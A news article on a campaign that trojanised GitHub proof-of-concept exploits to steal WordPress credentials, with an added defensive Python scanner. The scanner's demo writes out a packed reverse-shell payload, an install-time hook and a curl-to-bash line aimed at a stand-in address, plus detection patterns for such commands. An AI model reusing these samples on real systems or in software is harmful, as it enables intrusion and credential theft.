Major Security Breach: Over 390,000 WordPress Credentials Stolen in Targeted Campaign Against Security Researchers and Pentesters
In a significant cybersecurity breach, researchers from Datadog Security Labs have attributed the theft of more than 390,000 WordPress credentials to a threat actor they track as MUT-1244. The theft is the culmination of a year-long, large-scale operation that targeted a mix of cybersecurity professionals, including penetration testers, as well as other malicious actors.
The attackers seeded GitHub with dozens of fraudulent repositories that posed as proof-of-concept exploits. When victims downloaded and ran the code, a second-stage payload harvested credentials from their systems. The repositories gained credibility from being picked up by established threat intelligence feeds, and the operation also included a phishing campaign that coaxed targets into installing a fake kernel update, further expanding the attackers' reach.
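Given that mechanism, the check a practitioner wants is a quick triage of a cloned proof-of-concept repository before anything in it is executed. The Python script below is an added example written for this page, not code from Datadog Security Labs or from the campaign report. Its rules are generic trojanisation patterns (a download piped into a shell, exec() of a decoded or decompressed blob, install-time hooks in setup.py or package.json, embedded ELF/PE binaries, long high-entropy base64 blobs), not indicators of compromise for MUT-1244, and the sample repository it scans, including the documentation-range address 198.51.100.7, is constructed inline.

```python
"""Pre-execution triage of a downloaded proof-of-concept repository.

Cheap static heuristics for patterns that commonly mark a trojanised PoC.
Added example with generic rules; nothing here is a campaign indicator.
"""
import base64
import binascii
import math
import re
import tempfile
import zlib
from pathlib import Path

TEXT_RULES = [
    # download piped straight into a shell
    ("pipe_to_shell",
     re.compile(r"\b(?:curl|wget)\b[^\n]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")),
    # exec()/eval() fed from a decoded or decompressed blob on the same line
    ("exec_of_decoded_blob",
     re.compile(r"\b(?:exec|eval)\s*\(.*\b(?:b64decode|decompress|fromhex)\b")),
    # bash's built-in TCP device, the classic one-liner reverse shell
    ("dev_tcp_reverse_shell", re.compile(r"/dev/tcp/")),
    # code that runs at `pip install` time through a custom install command
    ("setup_py_install_hook",
     re.compile(r"\bcmdclass\s*=|\bclass\s+\w+\s*\(\s*(?:install|develop|build_py)\s*\)")),
    # code that runs at `npm install` time
    ("npm_lifecycle_script", re.compile(r'"(?:pre|post)install"\s*:')),
]
BINARY_MAGIC = {b"\x7fELF": "elf_binary", b"MZ": "pe_binary"}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")  # 120 keeps sha512 integrity fields out
SKIP_DIRS = {".git", "node_modules", "__pycache__"}


def shannon_entropy(s: str) -> float:
    """Bits per symbol: hex tops out at 4.0, so hashes fall below the gate
    used in suspicious_blob(); an 'A'*200 overflow filler scores 0."""
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def suspicious_blob(token: str) -> bool:
    """Long, valid base64 with more than 4.0 bits/symbol: an embedded
    payload, packed script or binary rather than a hash or filler."""
    try:
        base64.b64decode(token, validate=True)
    except binascii.Error:
        return False
    return shannon_entropy(token) > 4.0


def scan_file(path: Path, root: Path) -> list:
    """Return (relative_path, rule, line_no) for every hit in one file."""
    rel = path.relative_to(root).as_posix()
    data = path.read_bytes()
    for magic, rule in BINARY_MAGIC.items():
        if data.startswith(magic):
            return [(rel, rule, 0)]
    hits = []
    for no, line in enumerate(data.decode("utf-8", errors="replace").splitlines(), 1):
        hits.extend((rel, rule, no) for rule, rx in TEXT_RULES if rx.search(line))
        if any(suspicious_blob(tok) for tok in B64_TOKEN.findall(line)):
            hits.append((rel, "high_entropy_blob", no))
    return hits


def scan_tree(root) -> list:
    """Walk a checkout, skipping VCS and dependency dirs, and collect hits."""
    root = Path(root)
    hits = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and not (SKIP_DIRS & set(path.relative_to(root).parts)):
            hits.extend(scan_file(path, root))
    return hits


def summarize(hits) -> dict:
    """{relative_path: set(rules)} for quick reading."""
    out = {}
    for rel, rule, _ in hits:
        out.setdefault(rel, set()).add(rule)
    return out


def demo() -> dict:
    """Build a constructed sample checkout (one clean PoC plus several
    planted trojanisation patterns) in a temp dir and return the summary."""
    root = Path(tempfile.mkdtemp(prefix="poc-triage-"))
    (root / "bin").mkdir()
    # constructed stage-two dropper aimed at a documentation-range address
    stage2 = base64.b64encode(zlib.compress(
        b"import os,socket,subprocess\n"
        b"s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
        b"s.connect(('198.51.100.7',4444))\n"
        b"for fd in (0,1,2):\n    os.dup2(s.fileno(),fd)\n"
        b"subprocess.call(['/bin/sh','-i'])\n")).decode()
    files = {
        "README.md": "Proof-of-concept login checker (constructed sample).\n",
        "poc.py": ("import sys, urllib.request\n"
                   "url = sys.argv[1] + '/wp-login.php'\n"
                   "print(urllib.request.urlopen(url).status)\n"),
        "setup.py": ("from setuptools import setup\n"
                     "from setuptools.command.install import install\n"
                     "class PostInstall(install):\n"
                     "    def run(self):\n        import loader\n        install.run(self)\n"
                     "setup(name='poc', cmdclass={'install': PostInstall})\n"),
        "loader.py": "import base64, zlib\nexec(zlib.decompress(base64.b64decode('%s')))\n" % stage2,
        "configure": "#!/bin/sh\ncurl -fsSL http://198.51.100.7/dep.sh | bash\n",
        "package.json": '{"name": "poc", "scripts": {"postinstall": "node s.js"}}\n',
    }
    for name, text in files.items():
        (root / name).write_text(text)
    (root / "bin" / "helper").write_bytes(b"\x7fELF" + b"\0" * 60)
    return summarize(scan_tree(root))


if __name__ == "__main__":
    for rel, rules in sorted(demo().items()):
        print(f"{rel}: {', '.join(sorted(rules))}")
```

A hit is a reason to read the file, not proof of malice, and a clean scan says nothing about what the code fetches at runtime; unknown PoCs still belong in a disposable VM or container with no credentials mounted.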
Security experts have expressed their concerns regarding this attack methodology. Casey Ellis, Founder and Advisor at Bugcrowd, described the tactics as a reminder that even those who offer offensive security services can become part of an exploitable supply chain. Jason Soroko, Senior Fellow at Sectigo, emphasized the implications of this supply chain attack, noting how it undermined standard software acquisition processes by poisoning trusted sources.
“Security professionals must treat all code as potentially dangerous, even from established platforms,” cautioned Stephen Kowski, Field CTO at SlashNext Email Security+. He highlighted the necessity for robust verification measures and advanced threat detection tools to identify malicious patterns in real time.
This breach is a wake-up call for the cybersecurity community, underscoring the critical need for increased vigilance in code review and the implementation of automated security scanning solutions to prevent similar incidents in the future.